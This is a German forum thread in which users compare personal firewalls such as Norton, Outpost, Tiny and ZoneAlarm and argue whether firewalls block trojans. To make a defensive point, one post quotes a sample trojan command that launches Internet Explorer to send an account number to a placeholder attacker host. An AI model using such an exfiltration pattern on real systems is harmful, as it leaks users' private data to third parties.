Firewall

Tealc

treuer Stammgast
Hi Leutz!
:) Ich hätte da mal ne Frage! :)
Bisher benutze ich Norton Personl Firewall 2002 und bin damit eigentlich recht zufrieden!
Jetzt ist mir Tiny Personal Firewall 3.0 in die Hände gefallen! Macht auf mich einen netten Eindruck!
Ich möchte nur ungern 2 Firewalls gleichzeitig laufen lassen, da die jetzt schon Stress machen!
Mich würde interessieren was ihr du meinem "Problem" zu sagen habt!
Norton oder Tiny? Oder Zone Alarm oder, oder, oder?
Was ist die beste Feuerwand?


Danke!
 
Ich bin gerade dabei, das System neu aufzusetzen. Bei mir kommt dann Outpost als Wall auf den Rechner. Besonders der Stealthmodus (neben den vielen Einstellmöglichkeiten) hat es mir angetan. ;)
 
Norton ist mir zu aufgebläht.
Hab die Outpost laufen, ist ein hervorragendes Teilchen
 
Die Frage welche Firewall ist die Beste? Kann man so nicht stellen. Denn es kommt auf den Typ an wo dieser sich im Netz befindet und mit wem er überall chattet. Dabei kann ich auf jeden Fall schon mal vorweg sagen das ZoneAlarm eines der Firewall ist, die für den Autonormaluser die richtige Wahl ist.

Denn die sogenannten "Hacker" finden die meisten Normal-User uninterissant, da es bei denen nichts zu holen oder zu machen gibt. Mit Außnaheme der 0815-Hacker die sich zwar Hacker nennen aber es nicht sind, das sind nur Klick-Hacker die mit Programmen auf Windows herumspielen.

So gut wie jede Firewall überwacht die Ports so das nichts "schlimmes" passieren kann ;)

Wenn du aber so einer bist der sich mit jedem unbekannten im Netz unterhältst der dich anspricht und du überall im Netz auf sogenannten "Verbotenen Seiten" surfst oder du ein Business-User bist der allerlei geheime Firmendaten auf deinem Rechner hast, dann würde ich eine größere Firewall wie die von Norton empehlen.

Oder du haust dir ein Unix-System drauf z. B. Linux, denn das ist die Beste Firewall die ich kenne. Zudem ist das auch noch ein gutes Betriebsystem ;)
 
Danke für die Antworten!
Ich glaube, dann probiere ich mal Outpost! Mir war nur aufgefallen, dass ich in letzter Zeit oft auf Trojaner gescannt wurde und viel Angriffe in der History hatte!
Thx
 
Hi,
ich kann auch nur Outpost empfehlen,ist Deutsch und Freeware!

Auch die regelmässigen Updates sind kostenlos.

MfG Paffy
 
Ich kann mich SubSys's Antowrt anschließen - ich selber benutze auch Norton, sie ist zwar (verhältnismäßig) teuer, bietet aber auch den größten Schutz (wie auch in div. Tests von c't, CHIP etc. bestätigt). Hardwarefressend ist sie meiner Meinung nicht gerade, aber wenn man natürlich ein Zocker ist, und alles muss so schnell wie möglich sein - oder wenn man halt auf "gemäßigten" Sites bevorzugt surft, sollte man eine "NoCost"-oder"LowCost" Variante nehmen - ich selber habe da nur Erfahrnungen mit Zone Labs gemacht, die durchaus OK waren!
 
@Despo
das was in diesem Board diskutiert wird besitzt ein Stück Wahrheit:

Zitat:
--------------------------------------------------------------------------------
Warum sollen Firewalls nicht vor Trojanern schützen, das wäre mir neu.
--------------------------------------------------------------------------------

Firewalls überprüfen zwar alle Aus- und Eingehenden Programme an den Ports und bei unbekannten melden sie sich, wenn aber nun ein Trojaner sich wie der Internet Explorer (z. b. als Plugin) verhält hilft dagegen keine Firewall!!!

Zitat:
--------------------------------------------------------------------------------
Dann gibt es noch die Möglichkeit, sich als IE-Plugin zu tarnen oder gleich den InternetExploder mit entsprechenden Parametern aufzurufen: iexplore.exe www.hacker.tld/get.cgi?=deine_Kontonummer
--------------------------------------------------------------------------------

Trojaner können sogar ganz normale Systemdateien sein, da sie selbst nur als Serververbindung aggieren und somit auch als Programm oder als Systemdatei sich tarnen. Meldet sich nun die Firewall und der User erkennt das es z. B. eine Systemdatei ist die auf das Netz zugreifen will is Sense. Denn die meisten User überlassen dem Programm natürlich den Zutritt.

Und dies meistens aus Unwissen, denn welcher User weiss schon für was die Datei "msservice32.exe"
einen Zugriff braucht? Naja klingt ja nach irgendeinem Service von M$

Somit ist immer noch der User dafür Verantwortlich welchem Programm oder Datei er den Zugriff zum Netz überlässt!

Zum Schluss noch ein Zitat den ich nur beipflichten kann:

Zitat:
--------------------------------------------------------------------------------
Thus spake manman:
Wenn weiter oben behauptet wird, das xy-Firewall so schlecht/gut sein soll, würden mich mal die Gründe dafür interessieren
--------------------------------------------------------------------------------

Nein, umgekehrt. Du nennst mir mal die Bedrohung, vor der xy-Firewall schützen soll.
 
Dazu habe ich noch was zu Sagen. Bestimmt kennt jeder Linux User "nmap" is dochn tolles Programm oda? Oder jeder windows User kennt bestimmt "Back Or****" is sowas wie PCanywere :D

Sowas sind Programme die oft in Firewall-Tests benützt werden, um heraus zu finden ob die getestete Firewall auf die Aktivitäten dieser Programme anspricht. Somit hat sich schon mal herausgestellt das es Firewalls gab die auf keines dieser Programme ansprang und der Angriff ganz einfach durchzuführen war :rolleyes:
Und andere waren darin besser, aber nichts wird jemals sicher sein!

Würde aber nun der User wissen von welchem dieser Programme er mal angegriffen wird, würde er auch wissen welche Firewall er bräuchte. Leider bekommt das so gut wie keiner raus :(
 
"Ich möchte nur ungern 2 Firewalls gleichzeitig laufen lassen, da die jetzt schon Stress machen!"

Das dürfte dir auch kaum noch gelingen, die einzige (mir bekannte) funktionierende Kombi ist
ZoneAlarmPro mit Sygate bis Version 4.2, bei den meisten anderen Kombinationen gibt es Crash.
---
"Mir war nur aufgefallen, dass ich in letzter Zeit oft auf Trojaner gescannt wurde.."

Das wird sich auch mit einer neuen Firewall nicht ändern *ggg*
Für Verbindungsversuche gibt es aber noch ganz andere Ursachen, zB. wenn du vom
Serviceprovider eine IP-Nummer 'erbst', die vorher ein eDonkey-Anwender genutzt hat -
60-100 blockierte Kontaktaufnahmen in zehn Minuten sind dann keine Seltenheit.
---
Zu Desperados Hinweis auf die Trojaner-Board-Diskussion:
Diesen Risiko-Hinweisen aus dem Spätsommer 2001 wurde bei der mehrwöchigen Vorbereitung
des Security-Workshops https://www.supernature-forum.de/showthread.php?s=&threadid=8120 sorgfältig nachgegangen.

1. In den dort geführten Diskussionen mit den Verfassern/Verfechtern dieser Thesen hat sich
KEINER dazu bekannt, künftig auf seine Firewall verzichten zu wollen. Und dass Firewalls wirksam
sind, merkt man spätestens dann, wenn durch eine fehlerhafte Regel der Internetzugang blockiert ist.
2. Die wesentlichen FW-Schwachstellen für Normalanwender wurden von den Programmanbietern
inzwischen behoben.
3. Mit den gängigen Firewalls sind unautorisierte von aussen kommende Schäden durch Dritte
[Hacker] praktisch nicht mehr relevant, wenn man beim Zulassen von Server-Diensten restriktiv
verfährt. Generell sollte man also einer Anwendung erstmal KEINE Serverrechte einräumen -
ohne Serverrechte läuft kein einziger Trojaner, auch nicht als Plugin.

Was bleibend Sorge macht, ist die Verletzung der Privatsphäre durch vertrauensvoll angewählte
Internetseiten, ein paar von diesen noch relevanten Hinweisen findest du hier
Outgoing-Risiken -->https://www.supernature-forum.de/showthread.php?s=&threadid=8240
Sonstige Risiken -->https://www.supernature-forum.de/showthread.php?s=&threadid=8350
Eine Konsequenz aus diesen praktisch nie ganz zu schließenden Löchern ist es, dass bestimmte
Daten während der Nutzung des Internet in verschlüsselten Laufwerken/Bereichen verbleiben.

4. Eine Firewall muss sorgfältig konfiguriert werden - generelle Hinweise für Normalanwender
finden sich bei PC-Abschottung-Benutzerabschottung -->https://www.supernature-forum.de/showthread.php?s=&threadid=8177
Mit anderen Worten, die beste=sicherste Firewall ist die, die sich intuitiv beherrschen lässt und
durchschaubar bleibt SOWIE dauerhaft supportet wird.

In der Einsteiger-Stufe sind das u.a. Zonealarm und Sygate,
später Kerio, Norton, Outpost, SygatePro, Tiny, ZonealarmPro [alfabetische Nennung].

Schaut ruhig nochmal in 'Schlussbemerkungen / Weiterführende Links und Informationen'
[https://www.supernature-forum.de/showthread.php?s=&threadid=8135], sonst sind wir
wieder beim Thema "Welche Firewall empfiehlt Didi Hallervorden..."
 
Das dürfte dir auch kaum noch gelingen, die einzige (mir bekannte) funktionierende Kombi ist
ZoneAlarmPro mit Sygate bis Version 4.2, bei den meisten anderen Kombinationen gibt es Crash.
---

Also Tiny und Norton geht wunderbar zusammen!
 
Oben